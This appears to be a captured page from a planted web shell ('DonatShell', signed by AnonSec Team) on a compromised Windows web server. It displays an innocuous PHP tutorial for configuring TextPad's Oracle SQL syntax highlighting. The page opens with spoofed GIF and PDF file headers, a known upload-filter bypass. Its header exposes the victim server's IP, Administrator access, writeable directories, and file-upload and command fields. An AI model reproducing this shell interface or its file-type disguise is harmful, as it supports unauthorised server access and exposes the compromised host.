GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/Setup/TextPad/Oracle/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/Setup/TextPad/Oracle/TextpadOracleDocumentClassSetup.phpinc
<?
// /JimMartinson/Setup/Textpad/Oracle/TextpadOracleDocumentClassSetup.phpinc
$title = "Textpad Oracle SQL and PLSQL Document Class Setup";
$headTitle = '_CST_ - '.$title;
$pageTitle = '_CST_<br>'.$title;
include('common/pageHeader.phpinc');
$sectionTitle = $title;
include('common/sectionHeader.phpinc');
?>

<p class="center">
<a href="#Install">Install syntax file</a>
&nbsp;
<a href="#Config">Configure the conf document class</a>
</p>

<a name="Install">Install and configure the conf document class for *.sql:</a>
<ol class="instruction">
	<li><!-- 1 -->
		Download the <a href="Oracle/oracle.syn">oracle.syn syntax file</a> and select <b>Save</b> if using Internet Explorer (IE) or  <b>Save File</b> if using Firefox (FF).
		<br>
		<img src="../Save_IE.jpg" width="404" height="269" alt="IE save" />
		<img src="../Save_Firefox.jpg" width="439" height="187" alt="Firefox save" />
	</li>
	<li><!-- 2 -->
		Save this file in the system folder of your TextPad installation.
		<br>
		(Windows Vista or 7: "C:\Program Files (x86)\TextPad 5\system")
		(Windows XP: "C:\Program Files\TextPad 5\system")
		<br>
		<img src="TextPad_system.png" width="863" height="328" alt="TextPad system folder" />
	</li>
	<li><!-- 3 -->
		Open TextPad and select <strong><u>Configure</u></strong> and <strong>New Document <u>C</u>lass...</strong> from the menu.
		<br><img src="Oracle/03_Configure_NewDocumentClass.png" alt="Configure New Document Class">
	</li>
	<li><!-- 4 -->
		Enter <strong>sql</strong> as the Document class name and click Next.
		<br>
		<img src="Oracle/04_DocumentClassName.png" alt="Document class name: sql">
	</li>
	<li><!-- 5 -->
		Enter <strong>*.sql</strong> as the Class members and click Next.
		<br>
		<img src="Oracle/05_DocumentClassMembers.png" alt="Document class members *.sql">
	</li>
	<li><!-- 6 -->
		Click on <strong>Enable systax highlighting</strong>.
		<br>
		Select <strong>oracle.syn</strong> from the Syntax definition file select box and click Next.
		<br>
		<img src="Oracle/06_DocumentClassSyntaxFile.png" alt="Syntax file Oracle22.syn">
	</li>
	<li><!-- 7 -->
		Click Finish.
		<br>
		<img src="Oracle/07_DocumentClassFinish.png" alt="Document class finish">
		<br>
		You are done with the basic sql Document Class configuration. You can <a href="javascript:window.open('','_parent','');window.close();" onclick="window.open('','_parent','');window.close();return false;">close</a> this window or continue on to change the sql Document Class colors.
	</li>
</ol>

<a name="Config">Change color and other settings for your sql Document Class:</a>
<ol class="instruction">
	<li><!-- 1 -->
		Open TextPad and select <strong><u>Configure</u></strong> and <strong><u>P</u>references</strong> from the menu.
		<br>
		<img src="Oracle/c1_Configure_Preferences.png" alt="TextPad configure preferences">
	</li>
	<li><!-- 2 -->
		Expand the <strong>Document Classes</strong> and <strong>sql</strong> elements.
		<br>
		<img src="Oracle/c2_Configure_Preferences_sql1.png" alt="sql element">
	</li> 
	<li><!-- 3 -->
		You can now change Color, Font, Printing, Syntax, and Tabulation settings.
		<br>
		Note my change of <strong>Comments 2</strong> to <div class="inline" style="color:#FF0000; background-color:#FFFF00">red text on a yellow background</div>.
		<br>
		<img src="Oracle/c3_Configure_Preferences_sql2.png" alt="sql colors">
	</li>
</ol>

That's it for TextPad Oracle Document Class, shortcut, and color setup. 
You can <a href="javascript:window.open('','_parent','');window.close();" onclick="window.open('','_parent','');window.close();return false;">close</a> this window.

Anon7 - 2022
AnonSec Team